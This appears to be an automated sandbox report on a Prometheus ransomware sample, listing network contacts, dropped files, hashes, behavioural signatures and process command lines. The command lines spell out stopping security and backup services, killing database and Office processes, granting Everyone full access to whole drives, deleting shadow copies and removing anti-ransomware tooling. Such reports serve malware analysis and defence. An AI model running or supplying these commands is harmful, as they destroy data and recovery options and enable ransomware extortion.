| US | 8.8.8.8:53 | info.prometheusgroup.com | udp |
| US | 199.60.103.2:443 | info.prometheusgroup.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| US | 192.185.186.18:443 | www.imgurupload.com | tcp |
| N/A | 239.255.255.250:3702 | udp |
Files
memory/2020-59-0x0000000000EE0000-0x0000000000EE1000-memory.dmp
memory/2020-61-0x0000000004BC0000-0x0000000004BC1000-memory.dmp
memory/1068-62-0x0000000000000000-mapping.dmp
memory/1808-64-0x0000000000000000-mapping.dmp
memory/1760-63-0x0000000000000000-mapping.dmp
memory/1516-65-0x0000000000000000-mapping.dmp
memory/1684-66-0x0000000000000000-mapping.dmp
memory/1172-67-0x0000000000000000-mapping.dmp
memory/1512-68-0x0000000000000000-mapping.dmp
memory/572-69-0x0000000000000000-mapping.dmp
memory/1896-71-0x0000000000000000-mapping.dmp
memory/660-70-0x0000000000000000-mapping.dmp
memory/1780-72-0x0000000000000000-mapping.dmp
memory/1984-73-0x0000000000000000-mapping.dmp
memory/1620-74-0x0000000000000000-mapping.dmp
memory/1892-75-0x0000000000000000-mapping.dmp
memory/1784-76-0x0000000000000000-mapping.dmp
memory/864-77-0x0000000000000000-mapping.dmp
memory/688-78-0x0000000000000000-mapping.dmp
memory/1388-81-0x0000000000000000-mapping.dmp
memory/572-79-0x0000000076281000-0x0000000076283000-memory.dmp
memory/1368-82-0x0000000000000000-mapping.dmp
memory/1120-83-0x0000000000000000-mapping.dmp
memory/1624-84-0x0000000000000000-mapping.dmp
memory/1364-86-0x0000000000000000-mapping.dmp
memory/1208-87-0x0000000000000000-mapping.dmp
memory/1716-88-0x0000000000000000-mapping.dmp
memory/1796-85-0x0000000000000000-mapping.dmp
memory/980-89-0x0000000000000000-mapping.dmp
memory/268-91-0x0000000000000000-mapping.dmp
memory/932-93-0x0000000000000000-mapping.dmp
memory/1056-94-0x0000000000000000-mapping.dmp
memory/1084-92-0x0000000000000000-mapping.dmp
memory/936-90-0x0000000000000000-mapping.dmp
memory/804-95-0x0000000000000000-mapping.dmp
memory/1592-96-0x0000000000000000-mapping.dmp
memory/564-97-0x0000000000000000-mapping.dmp
memory/1884-98-0x0000000000000000-mapping.dmp
memory/772-99-0x0000000000000000-mapping.dmp
memory/108-100-0x0000000000000000-mapping.dmp
memory/1780-101-0x0000000000000000-mapping.dmp
memory/1684-104-0x0000000000000000-mapping.dmp
memory/660-106-0x0000000000000000-mapping.dmp
memory/1964-105-0x0000000000000000-mapping.dmp
memory/1612-103-0x0000000000000000-mapping.dmp
memory/564-102-0x0000000000000000-mapping.dmp
memory/2084-109-0x0000000000000000-mapping.dmp
memory/2060-108-0x0000000000000000-mapping.dmp
memory/2116-111-0x0000000000000000-mapping.dmp
memory/2132-113-0x0000000000000000-mapping.dmp
memory/2188-116-0x0000000000000000-mapping.dmp
memory/2144-114-0x0000000000000000-mapping.dmp
memory/2096-110-0x0000000000000000-mapping.dmp
memory/2104-112-0x0000000000000000-mapping.dmp
memory/2212-117-0x0000000000000000-mapping.dmp
memory/2172-115-0x0000000000000000-mapping.dmp
memory/2252-118-0x0000000000000000-mapping.dmp
memory/2312-121-0x0000000000000000-mapping.dmp
memory/2268-120-0x0000000000000000-mapping.dmp
memory/2288-119-0x0000000000000000-mapping.dmp
memory/1372-107-0x0000000000000000-mapping.dmp
memory/2336-124-0x0000000000000000-mapping.dmp
memory/2280-123-0x0000000000000000-mapping.dmp
memory/2320-122-0x0000000000000000-mapping.dmp
memory/2356-125-0x0000000000000000-mapping.dmp
memory/2376-126-0x0000000000000000-mapping.dmp
memory/2400-127-0x0000000000000000-mapping.dmp
memory/2064-129-0x0000000002330000-0x0000000002331000-memory.dmp
memory/2064-130-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
memory/2064-131-0x0000000004AB0000-0x0000000004AB1000-memory.dmp
memory/2064-132-0x0000000004AB2000-0x0000000004AB3000-memory.dmp
memory/2064-133-0x00000000025A0000-0x00000000025A1000-memory.dmp
memory/2064-134-0x0000000002810000-0x0000000002811000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | a41b4f125c422116c63994583cb8d3db |
| SHA1 | 4df39e689197f328fed0b49c8c55d36e11aa8076 |
| SHA256 | 07267f566df694c5e4e15054a5c4d332f679b52bf9fccaf30c5aa7de1af708e8 |
| SHA512 | 894b1c4b6c12dbde098496ed0b3180975860c354c188e0a42a2c8f985efd12b2e163bbc2188d13edc01c40502845773167e15ba92ee6abd2219aceea1c84a859 |
memory/3580-139-0x0000000004850000-0x0000000004851000-memory.dmp
memory/3580-140-0x0000000004852000-0x0000000004853000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jrwtlxau.exe
| MD5 | c590a84b8c72cf18f35ae166f815c9df |
| SHA1 | b97761358338e640a31eef5e5c5773b633890914 |
| SHA256 | 57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4 |
| SHA512 | dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018 |
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
| MD5 | 063a2b596f25a80d12bc29c8809d01db |
| SHA1 | 3c953fbcf110a6d0d8e5bf85b836906a43d500d4 |
| SHA256 | 96e37cb15d0e47409c388c549336051976f082e29149f8503ace4be3069728ad |
| SHA512 | 1edd687b2dc4886ff9a060bbea692204244efc6405c3a07b5fa5500afafb74a08879f6f7648c26cc5528adfe0eb5830a4badcb931a8a173c60f5e80b4f74d550 |
memory/2064-147-0x00000000056F0000-0x00000000056F1000-memory.dmp
memory/2064-152-0x0000000005770000-0x0000000005771000-memory.dmp
memory/2064-153-0x0000000006160000-0x0000000006161000-memory.dmp
memory/2064-154-0x000000007EF30000-0x000000007EF31000-memory.dmp
memory/2064-161-0x0000000006280000-0x0000000006281000-memory.dmp
memory/2064-162-0x0000000005650000-0x0000000005651000-memory.dmp
memory/2064-176-0x0000000006380000-0x0000000006381000-memory.dmp
memory/2064-177-0x0000000006390000-0x0000000006391000-memory.dmp
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
| MD5 | 821740b3797047b94157666cc0f3455b |
| SHA1 | 50badabfff08e6c51c89f528a5ffa2123356e901 |
| SHA256 | f19472eb84d7a81e50f907127c9f18cdc0a1c5ddfe974513d98837f8ae2a5578 |
| SHA512 | 4d03c538a64a8ea34cdc99fab14584e43c9d237dbc06682d2be5c0b9a5b9a0f9d2c2e9e86131589d1d767536c2b65d02c992290cb4d7cccbe2e8cd68e54a547d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 6045baccf49e1eba0e674945311a06e6 |
| SHA1 | 379c6234849eecede26fad192c2ee59e0f0221cb |
| SHA256 | 65830a65cb913bee83258e4ac3e140faf131e7eb084d39f7020c7acc825b0a58 |
| SHA512 | da32af6a730884e73956e4eb6bff61a1326b3ef8ba0a213b5b4aad6de4fbd471b3550b6ac2110f1d0b2091e33c70d44e498f897376f8e1998b1d2afac789abeb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 06fcadd4009c49c3d024e7c3ff9ab157 |
| SHA1 | 3540d151afcad25a99889ce1e4bf96c974ec8d61 |
| SHA256 | 5c4fa483a4aabfb34e53df4d44f76a9357e9da74394d0bb6f2cc692e929daea7 |
| SHA512 | 902eb5d61b0b06d2e5ac6fc946fb389e75c802f8b6128eb14b59b217d9af7fe4f55784141ee27a1fa37418f8f12c775e1141abf7401b4220e4fbd8fc9dc18bb9 |
Analysis: behavioral2
Detonation Overview
Submitted
2021-06-02 15:02
Reported
2021-06-02 15:04
Platform
win10v20210408
Max time kernel
149s
Max time network
158s
Command Line
Signatures
Prometheus Ransomware
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Downloads MZ/PE file
Downloads PsExec from SysInternals website
| Description | Indicator | Process | Target |
| HTTP URL | http://live.sysinternals.com/PsExec.exe | N/A | N/A |
Modifies Windows Firewall
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | icanhazip.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
Kills process with taskkill
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe
"C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe"
C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
C:\Windows\SysWOW64\arp.exe
"arp" -a
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
